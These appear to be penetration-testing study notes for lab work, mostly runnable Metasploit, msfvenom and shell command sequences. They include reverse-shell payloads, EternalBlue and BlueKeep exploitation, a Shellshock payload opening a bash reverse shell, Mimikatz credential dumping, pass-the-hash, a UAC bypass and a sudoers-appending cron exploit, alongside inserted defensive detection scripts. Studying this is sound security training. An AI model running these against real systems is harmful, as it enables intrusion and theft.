Assessment Methodologies#
- IP Addresses
- Directories
- Names
- Emails
- Phone Numbers
- Physical Addresses
- Web Technologies Used
- BuiltWith → Firefox Addon (Recommended)
- Wappalyzer → Extension
- whatweb <domain> → Linux Tool
- webhttrack → Website Copier
Whois Enumeration#
DNS Recon#
WAF#
Subdomain Enumeration#
Google Dorks#
- cache:ine.com
- Exploit-DB Dorks
Email Harvesting#
Leaked Password Databases#
DNS Zone Transfer#
- /etc/hosts → Local DNS
- dnsenum
- dig
- fierce
- nmap
- netdiscover
Host Discovery Techniques#
- Ping Sweeps → ICMP Echo Requests → Tool: fping
fping -a -g 10.10.23.0/24
- ARP Scanning
- TCP SYN Ping → Half-Open Scan
- UDP Ping
- TCP ACK Ping
- SYN-ACK Ping → Sends SYN-ACK packets
NMAP#
- Scripts → /usr/share/nmap/scripts/
- Firewall/IDS Evasion
- -f → Fragments IP packets
- -D → Decoy
- -Pn vs -sn
- -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets → to identify targets
- -Pn
- Types of Scans:
- TCP Connect Scans (-sT)
- SYN “Half-open” Scans (-sS)
- UDP Scans (-sU)
- TCP Null Scans (-sN) → sent with no flags set at all
- As per the RFC, the target host should respond with a RST if the port is closed.
- TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection)
- Nmap expects a RST if the port is closed.
- TCP Xmas Scans (-sX) → sends a malformed TCP packet and expects a RST response for closed ports.
- If a UDP port doesn’t respond to an Nmap scan, it will be marked as open|filtered
- NULL, FIN and Xmas → Firewall Evasion
- Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port
- Zenmap:
- Green → Machine is alive
- Red → Machine is alive but not responding or not directly accessible
- Yellow → The machine from which we launched the scan (that is, the attacker machine); Zenmap plots the other hosts' connections to localhost with their hostnames and IP addresses.
nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery
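Added example (not from these notes): a Python script that names the probe type from TCP flag bits, reproduces the port-state inference described above for SYN, NULL/FIN/Xmas and UDP scans, and flags sources that send inverse-scan probes across several ports, which is the detection-side view of the same rules. The flow records are constructed.

```python
"""
Classify inbound TCP probes by flag combination (NULL, FIN, Xmas, SYN, ACK),
apply the port-state inference Nmap uses for each scan type, and flag sources
sending inverse-scan probes across many ports. Added example; the flow
records are constructed, not captured traffic.
"""
from collections import defaultdict

# TCP flag bits as laid out in the header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags: int) -> str:
    """Name the probe type from the flag bits of an inbound TCP segment."""
    if flags == 0:
        return "NULL"                      # -sN: no flags at all
    if flags == FIN:
        return "FIN"                       # -sF: FIN only
    if flags == FIN | PSH | URG:
        return "XMAS"                      # -sX: FIN, PSH and URG "lit up"
    if flags == SYN:
        return "SYN"                       # -sS half-open / -sT connect / -PS
    if flags == ACK:
        return "ACK"                       # -PA ping / -sA scan
    return "OTHER"


def infer_port_state(scan: str, response: str) -> str:
    """
    Port state Nmap reports for a given probe/response pair.
    response: "SYN-ACK", "RST", "ICMP-PORT-UNREACH", "ICMP-OTHER-UNREACH",
              "UDP-DATA" or "NONE".
    Inverse scans (NULL/FIN/Xmas) can only prove 'closed' via an RST, so
    silence is ambiguous and reported as open|filtered.
    """
    if scan in ("NULL", "FIN", "XMAS"):
        if response == "RST":
            return "closed"
        if response.startswith("ICMP"):
            return "filtered"
        return "open|filtered"
    if scan == "SYN":
        if response == "SYN-ACK":
            return "open"
        if response == "RST":
            return "closed"
        return "filtered"
    if scan == "UDP":
        if response == "UDP-DATA":
            return "open"
        if response == "ICMP-PORT-UNREACH":
            return "closed"
        if response.startswith("ICMP"):
            return "filtered"
        return "open|filtered"
    raise ValueError(f"unknown scan type: {scan}")


# Constructed flow records: (source IP, destination port, TCP flags)
FLOWS = [
    ("10.10.23.5", 22, 0), ("10.10.23.5", 80, 0), ("10.10.23.5", 443, 0),
    ("10.10.23.5", 3389, 0), ("10.10.23.5", 8080, 0),
    ("10.10.23.7", 80, SYN), ("10.10.23.7", 80, ACK),          # normal handshake
    ("10.10.23.9", 21, FIN | PSH | URG), ("10.10.23.9", 22, FIN | PSH | URG),
]


def detect_inverse_scans(flows, threshold=3):
    """
    Map "src_ip TYPE" -> sorted ports for every source that sent NULL, FIN or
    Xmas probes to at least `threshold` distinct ports. No normal TCP stack
    opens a conversation with these flag sets, so a low threshold is enough.
    """
    probes = defaultdict(set)
    for src, port, flags in flows:
        kind = classify_probe(flags)
        if kind in ("NULL", "FIN", "XMAS"):
            probes[(src, kind)].add(port)
    return {f"{src} {kind}": sorted(ports)
            for (src, kind), ports in probes.items() if len(ports) >= threshold}


if __name__ == "__main__":
    for src, ports in detect_inverse_scans(FLOWS).items():
        print(f"{src} scan against ports {ports}")
```

The detector only counts distinct ports per source and flag set, so a single stray malformed segment never trips it; the Windows behaviour noted above (a RST for every port) means the inference in `infer_port_state` is only meaningful against RFC-compliant stacks.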
FFUF#
- You could also use any custom keyword instead of FUZZ; you just need to define it like this: wordlist.txt:KEYWORD
ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
- generic list of files such as raft-medium-files-lowercase.txt
ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
- To hide the progress: append 2>/dev/null
- Directories:
ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
- By adding -fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes.
- -mc 200 → Only shows 200
- -fr → Filter by regexp
Audit#
Penetration Testing#
Windows Vulnerabilities#
- Windows IIS - Port 80, 443
- WebDAV - Port 80, 443
- SMB/CIFS - Port 445
- RDP - Port 3389
- WinRM - Port 5986/443
Exploit - WebDAV IIS#
nmap -sV -p 80 --script=http-enum <target>
hydra -L <username-list> -P <password-list> <target> http-get /webdav/
davtest -auth user:password -url <url>
cadaver <url> → Enter username & password
- Webshells → /usr/share/webshells
dir C:/ & type C:/<filepath>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
service postgresql start && msfconsole
use multi/handler → Use to set up a listener for the payload you created with msfvenom
set payload windows/meterpreter/reverse_tcp
show options
- set LHOST & LPORT & Run
Exploit - SMB : PSExec#
nmap -sV -sC <target>
scanner/smb/smb_login
psexec.py Administrator@192.168.1.1
- Usernames:
/usr/share/metasploit/data/wordlists/common_users.txt
exploit/windows/smb/psexec
Exploit - SMB : Eternal Blue(MS17-010)#
- https://github.com/3ndG4me/AutoBlue-MS17-010
cd shellcode
./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless
nc -lvnp 1234
python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin
- Method 2 : Metasploit
use windows/smb/ms17_010_eternalblue
Exploit - RDP#
use auxiliary/scanner/rdp/rdp_scanner → Set RHOSTS & RPORT → To detect RDP
hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
xfreerdp /u:<username> /p:<password> /v:<target>:<port>
Exploit - WinRM#
- Port → 5985
crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>
crackmapexec winrm <target> -u <username> -p <password> -x <command>
evil-winrm.rb -u <username> -p <password> -i <target>
use exploit/windows/winrm/winrm_script_exec
- set FORCE_VBS true
- set username & password
- exploit
> use auxiliary/scanner/winrm/winrm_auth_methods
> use auxiliary/scanner/winrm/winrm_login
> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
> set VERBOSE false
> use auxiliary/scanner/winrm/winrm_cmd
> set USERNAME administrator
> set PASSWORD tinkerbell
> set cmd whoami
> run
> use exploit/windows/winrm/winrm_script_exec
> set USERNAME <>
> set PASSWORD <>
> set LHOST <IP>
> set FORCE_VBS true
> run
> sysinfo
Privilege Escalation#
Windows#
Exploit - UAC#
- UAC → User Account Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS
- It ensures that changes to the OS require approval from an admin or a user account that is part of the admin group
- https://github.com/hfiref0x/UACME
net users
net localgroup administrators
use exploit/windows/http/rejetto_hfs_exec
pgrep explorer → note the PID
migrate <PID> → moves the session from x86 to x64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
upload backdoor.exe
upload /root/Desktop/Tools/UACME/Akagi64.exe
.\Akagi64.exe 23 C:\Temp\backdoor.exe
Enumeration#
Importing Nmap results into MSF#
service postgresql start
msfconsole
msf> db_status
msf> workspace
msf> workspace -a <name> // Create a new workspace
msf> db_import <path_to_file>
msf> hosts // Check whether the data imported successfully
msf> services // Check whether the data imported successfully
msf> db_nmap -Pn -sV -O 10.4.22.173 // Results will be saved in MSF DB
Port Scanning with Auxiliary Modules#
service postgresql start
msfconsole
msf> workspace -a portscan
msf> search portscan
msf> use <module_name> / <index> // scanner/portscan/tcp
msf> show options
msf> set RHOSTS 192.168.100.43 // TARGET IP
msf> curl <> // If HTTP is open
msf> search xoda
msf> use <index/module_name>
msf> show options
msf> set RHOSTS <TARGET IP>
msf> set TARGETURI / -> // Set the path where service is hosted
msf> exploit // It will give meterpreter session
mp> sysinfo // Target Information
mp> shell // Open shell session
bash> ifconfig // Identify next target address (x.x.x.x+1)
bash> exit // CTRL + C
mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route
mp> background // Will take this session in Background
msf> sessions // View current sessions
msf> search portscan
msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1)
msf> run
msf> back
msf> search udp_sweep
ERROR:
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
SOLUTION:
SET LHOST <BASE_MACHINE_IP> // Attacker IP
FTP Enumeration#
msf> search type:auxiliary name:ftp
msf> use auxiliary/scanner/ftp/ftp_version
msf> use auxiliary/scanner/ftp/ftp_login
msf> set RHOSTS <IP>
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> run
msf> use auxiliary/scanner/ftp/anonymous
SMB Enumeration#
msf> setg RHOSTS <IP> // Setting a Global variable
msf> search type:auxiliary name:smb
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_enumusers
msf> info // See info about module
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set ShowFiles true
msf> use auxiliary/scanner/smb/smb_login
msf> set SMB_USER admin
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
bash> smbclient -L \\\\<IP>\\ -U admin // -L: List all shares
bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name
Web Server Enumeration#
msf> setg RHOSTS <IP>
msf> setg RHOST <IP>
msf> search type:auxiliary name:http
msf> use auxiliary/scanner/http/http_version
msf> use auxiliary/scanner/http/http_header
msf> use auxiliary/scanner/http/robots_txt
msf> use auxiliary/scanner/http/dir_scanner
msf> use auxiliary/scanner/http/files_dir
msf> use auxiliary/scanner/http/http_login
msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials
msf> unset USERPASS_FILE
msf> run
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> echo "<username>" > user.txt
msf> use auxiliary/scanner/http/http_login
msf> set USER_FILE /root/user.txt
MySQL Enumeration#
// MySQL - TCP Port 3306
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_login
msf> set USERNAME root
msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run // It will bruteforce passwords
// auxiliary/admin/ -> This admin modules requires credentials
msf> use auxiliary/admin/mysql/mysql_enum
msf> set PASSWORD <password> // This module requires creds
msf> set USERNAME root
msf> run
msf> use auxiliary/admin/mysql/mysql_sql
msf> set USERNAME root
msf> set PASSWORD <password>
msf> set SQL show databases;
msf> use auxiliary/scanner/mysql/mysql_schemadump
msf> set USERNAME root
msf> set PASSWORD <password>
bash> mysql -h <IP> -u root -p
SSH Enumeration#
msf> search type:auxiliary name:ssh
msf> use auxiliary/scanner/ssh/ssh_version
msf> use auxiliary/scanner/ssh/ssh_login // Password Auth
msf> use auxiliary/scanner/ssh/ssh_login_pubkey // Key-Pair Auth
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf> sessions <number>
msf> /bin/bash -i
bash> ls
msf> use auxiliary/scanner/ssh/ssh_enumusers
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
SMTP Enumeration#
msf> search type:auxiliary name:smtp
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/smtp/smtp_enum
Vulnerability Assessment#
Frequently Exploited Windows Services#
- Microsoft IIS → Port 80/443 → Web Server
- WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server
- SMB/CIFS → Port 445 → Network File Sharing Protocol
- RDP → Port 3389 → Remotely authenticate & interact with Windows system
- WinRM → Port 5986/443 → Windows remote management protocol
MSF Vulnerability Scanning#
bash> searchsploit "Microsoft Windows SMB"
bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
> wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb
> mv db_autopwn.rb /usr/share/metasploit-framework/
msf> load db_autopwn
> db_autopwn -p -t
> db_autopwn -p -t -PI 445
> analyze
MS17-010 SMB Vulnerability (EternalBlue Exploit)#
- EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System
- Affected Versions
- Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016
> nmap -sV -p 445 -O <IP>
> nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
> git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
> cd <DIR>
> pip install -r requirements.txt
> cd shellcode && chmod +x shell_prep.sh
> ./shell_prep.sh // 1. Type Y, 2. Enter LHOST IP, 3. Enter LHOST port, 4. Type 1 (Regular CMD Shell), 5. Type 1 (Stageless payload) -> produces sc_x86.bin / sc_x64.bin
> cd ..
> chmod +x eternalblue_exploit7.py
> nc -nvlp 1234
> python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
// Method 2
msf> search eternalblue
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS <IP>
BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)#
- Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of
> sudo nmap -p 3389 <IP>
msf> search BlueKeep
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf> set RHOSTS <IP>
msf> run
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf> set RHOSTS
msf> exploit
PassTheHash Attack#
bash> service postgresql start && msfconsole
msf> search badblue
msf> use exploit/windows/http/badblue_passthru
msf> set RHOSTS <IP>
msf> exploit
mp> pgrep lsass
mp> migrate 780
mp> getuid
mp> load kiwi
mp> lsa_dump_sam // Administrative NTLM Creds
msf> use exploit/windows/smb/psexec
msf> set LPORT <PORT>
msf> set RHOSTS <IP>
msf> set SMBUser Administrator
msf> set SMBPass <LMHash>:<NTLM Hash>
msf> set target Native\ upload
msf> exploit
// Method 2
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"
Shellshock (Bash CVE-2014-6271 Vulnerability)#
- Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.
> nmap -sV <IP>
> nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
> Capture this request in Burp
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
> nc -nvlp 1234
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
msf> search shellshock
msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf> set RHOSTS <IP>
msf> set TARGETURI /gettime.cgi
msf> exploit
Vulnerability Scanning#
Nessus#
sudo dpkg -i Nessus.deb // Download from Nessus Website
sudo systemctl start nessusd.service
WMAP#
msf> setg RHOSTS <IP>
msf> load wmap
msf> wmap_sites -a <IP>
msf> wmap_targets -t http://<IP>
msf> wmap_sites -l
msf> wmap_targets -l
msf> wmap_run -t
Windows Privilege Escalation#
Windows Kernel Exploits#
msf> getsystem // command to run privilege escalation
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION <Number>
msf> run
Bypassing User Account Control (UAC)#
- In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system.
- UACMe: https://github.com/hfiref0x/UACME
> net users
> net localgroup administrators
> setg RHOSTS <IP>
> search rejetto
> run
> sysinfo // 32-bit mp session
> pgrep explorer
> migrate <ID>
> sysinfo // 64-bit mp session
> shell
> net user
> net localgroup administrators
// MSF : UACME
> use multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT <Port>
> run
// Create Payload
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o backdoor.exe
// Continue Previous Session
> pwd
> getuid
> getprivs
> cd C:\\
> mkdir temp
> cd temp
> upload backdoor.exe
> upload /root/Desktop/tools/UACME/Akagi64.exe
> shell
> dir
> Akagi64.exe 23 C:\temp\backdoor.exe
// It will connect back to the multi/handler listener
> getuid
> getprivs
> getsystem
> hashdump
Access Control Impersonation#
- Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system.
- Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process.
- Privileges:
- SeAssignPrimaryToken: This allows a user to impersonate tokens
- SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
- SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges.
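Added example (not from these notes): a Python parser for `whoami /priv` output that flags the three token-related privileges listed above, using the full names Windows prints (the notes abbreviate SeAssignPrimaryTokenPrivilege and SeCreateTokenPrivilege), so an administrator can audit which accounts hold them. The sample output is constructed.

```python
"""
Parse `whoami /priv` output and flag the token-related privileges the notes
list (SeAssignPrimaryToken, SeCreateToken, SeImpersonatePrivilege) so an
administrator can see which accounts hold them. Added example; the sample
output is constructed, the privilege names are the full names as Windows
prints them.
"""
import re

# Full names as printed by `whoami /priv`; the notes use shortened forms.
TOKEN_PRIVILEGES = {
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a process",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeImpersonatePrivilege": "run a process under another user's token",
}

# One privilege per line: name, free-text description, Enabled/Disabled
PRIV_LINE = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Constructed sample of `whoami /priv` output
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege name: "Enabled"/"Disabled"} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def token_privilege_findings(text: str) -> list:
    """
    Return [(name, state, what it allows)] for every privilege in
    TOKEN_PRIVILEGES present in the output, enabled or not: a disabled
    privilege is still held by the token and can be enabled by its holder.
    """
    privs = parse_whoami_priv(text)
    return [(name, privs[name], TOKEN_PRIVILEGES[name])
            for name in sorted(privs) if name in TOKEN_PRIVILEGES]


if __name__ == "__main__":
    for name, state, meaning in token_privilege_findings(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} -> {meaning}")
```

Feed it the saved output of `whoami /priv` from a service account or web-application identity; any line it reports is a privilege worth removing from that account where the service does not need it.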
> nmap <IP>
> search rejetto
> set RHOSTS <IP>
> exploit
> sysinfo
> pgrep explorer
> migrate <ID>
> getuid
> getprivs
> use incognito
> list_tokens -u
> impersonate_token <Name>
> getuid
> pgrep explorer
> migrate <ID>
Alternate Data Streams (ADS)#
- ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS
- Any file created on an NTFS drive will have two different forks/streams:
- Data Stream → Default stream that contains data of the file
- Resource Stream → Typically contains metadata of the file
- Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection
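Added example (not from these notes): a Python script that reads `dir /r` output (the cmd.exe switch that lists NTFS streams), lists every alternate data stream and singles out those carrying executable content, which is how a defender finds what the note above describes. The listing is constructed.

```python
"""
Find alternate data streams from the output of `dir /r` (the cmd.exe switch
that lists NTFS streams) and single out streams that carry executable
content. Added example; the directory listing is constructed. Run the
command on the Windows host and feed its text to this script.
"""
import re

# Stream lines carry no date column: just a size and "file:stream:$DATA"
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Stream names that are expected and benign (Mark-of-the-Web)
BENIGN_STREAMS = {"Zone.Identifier"}
EXECUTABLE_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js")

# Constructed sample of `dir /r` output
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\Temp

10/03/2023  09:12 AM    <DIR>          .
10/03/2023  09:12 AM    <DIR>          ..
10/03/2023  09:15 AM                45 notes.txt
                                    26 notes.txt:Zone.Identifier:$DATA
10/03/2023  09:20 AM             1,024 report.docx
                                73,802 report.docx:update.exe:$DATA
               2 File(s)          1,069 bytes
"""


def find_alternate_streams(dir_r_output: str) -> list:
    """Return (file name, stream name, size in bytes) for every named stream."""
    found = []
    for line in dir_r_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(dir_r_output: str) -> list:
    """Return (file, stream, size, reason) for streams worth a closer look."""
    findings = []
    for name, stream, size in find_alternate_streams(dir_r_output):
        if stream in BENIGN_STREAMS:
            continue
        if stream.lower().endswith(EXECUTABLE_EXT):
            findings.append((name, stream, size, "executable content in stream"))
        else:
            findings.append((name, stream, size, "unexpected named stream"))
    return findings


if __name__ == "__main__":
    for name, stream, size, reason in suspicious_streams(SAMPLE_DIR_R):
        print(f"{name}:{stream} ({size} bytes): {reason}")
```

Zone.Identifier is the one stream almost every downloaded file carries, so it is allow-listed; anything else with a named stream, and especially a stream that looks like a binary, is what the note above calls hidden content and should be inspected.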
Unattended Windows Setup#
- Config Files:
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Autounattend.xml
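Added example (not from these notes): a Python audit that parses an answer file from the paths above and reports every credential element that still holds a value and whether it is stored in plain text, without decoding it. The XML is constructed and the element names follow the Microsoft unattend schema.

```python
"""
Audit an unattended-setup answer file for credential elements left behind
after imaging (AdministratorPassword, AutoLogon Password, LocalAccount
Password). Added example; the XML below is constructed and the path list
repeats the locations given in the notes. The audit reports where a
credential sits and whether it is stored in plain text; it does not decode it.
"""
import xml.etree.ElementTree as ET

UNATTEND_PATHS = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Autounattend.xml",
]

# Constructed answer file; the Value strings are placeholders
SAMPLE_UNATTEND = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>QmFzZTY0UGxhY2Vob2xkZXI=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>QmFzZTY0UGxhY2Vob2xkZXI=</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>PlaceholderPassword</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.split("}", 1)[-1]


def find_leftover_credentials(xml_text: str) -> list:
    """
    Return one dict per credential element that still carries a Value:
    {"context": parent element, "element": tag, "plaintext": bool, "account": name}
    """
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if _local(elem.tag) not in ("AdministratorPassword", "Password"):
            continue
        value, plaintext = None, False
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        parent = parent_of.get(elem)
        context = _local(parent.tag) if parent is not None else "root"
        # AdministratorPassword is implicitly the built-in Administrator;
        # otherwise a sibling Username/Name element names the account
        account = "Administrator" if _local(elem.tag) == "AdministratorPassword" else None
        if parent is not None:
            for sib in parent:
                if _local(sib.tag) in ("Username", "Name") and sib.text:
                    account = sib.text.strip()
        findings.append({"context": context, "element": _local(elem.tag),
                         "plaintext": plaintext, "account": account})
    return findings


if __name__ == "__main__":
    for f in find_leftover_credentials(SAMPLE_UNATTEND):
        how = "PLAIN TEXT" if f["plaintext"] else "base64"
        print(f"{f['context']}/{f['element']}: account={f['account']} stored as {how}")
```

A clean post-deployment image should produce no findings: either the file is removed from the Panther directory or its credential elements are emptied. A base64 value is not encryption, which is why the notes can recover it with base64 -d.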
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
> python -m SimpleHTTPServer 80
// Windows
> cd Desktop
> certutil -urlcache -f http://<Kali>/payload.exe payload.exe
> msfconsole
> use multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT 1234
> run
// Execute the payload in Windows
> search -f unattend.xml
> cd C:\\Windows\\Panther
> download unattend.xml
> vim password.txt
> base64 -d password.txt
> psexec.py Administrator@<IP> // Enter password
// Windows: runas.exe /user:Administrator cmd // Enter password
Dumping Hashes with Mimikatz#
- Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickets from memory.
> nmap -sV <IP>
> msfconsole
> search badblue
> use exploit/windows/http/badblue_passthru
> set RHOSTS <IP>
> exploit
> sysinfo
> getuid
> pgrep lsass
> migrate <ID>
> getuid
> load kiwi
> ? // Help Menu
> creds_all // Dump all creds
> lsa_dump_sam
> lsa_dump_secrets
> cd C:\\
> mkdir Temp
> cd Temp
> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
> shell
> dir
> mimikatz.exe
> privilege::debug
> lsadump::sam
> lsadump::secrets
> sekurlsa::logonpasswords
Linux Exploits#
FTP#
> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd
SSH#
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh
SAMBA#
- SAMBA is a Linux implementation of SMB
- SAMBA allows Windows systems to access Linux shares & devices
> nmap -sV <IP>
> hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
> smbmap -H <IP> -u admin -p <password>
> smbclient -L <IP> -U admin
> smbclient //<IP>/shawn -U admin
> ?
> dir
> smbclient //<IP>/nancy -U admin
> get flag
> ls
> cat flag
> smbclient //<IP>/admin -U admin
> tar xzf flag.tar.gz
> cat flag
> enum4linux -a <IP>
> enum4linux -a -u admin -p <password> <IP>
Linux Privilege Escalation#
Linux Kernel Exploits#
> sysinfo
> getuid
> shell
> /bin/bash -i
> cat /etc/passwd
> // Quick Download: Linux Exploit Suggester
> chmod +x les.sh
> ./les.sh
- Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule
- In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the cron job
> whoami
> groups <user>
> cat /etc/passwd
> crontab -l // List crontab for current user
> ls -la
> cd /
> grep -rnw /usr -e "/home/student/message"
> cat /tmp/message
> ls -la /usr/local/share/copy.sh
> cat /usr/local/share/copy.sh
> printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
> sudo su
SUID Binaries#
- SUID → Set Owner User ID permission
- This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary
- SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions.
- The elevated privileges apply only while that script or binary is executing & do not persist as a general elevation of the user's privileges.
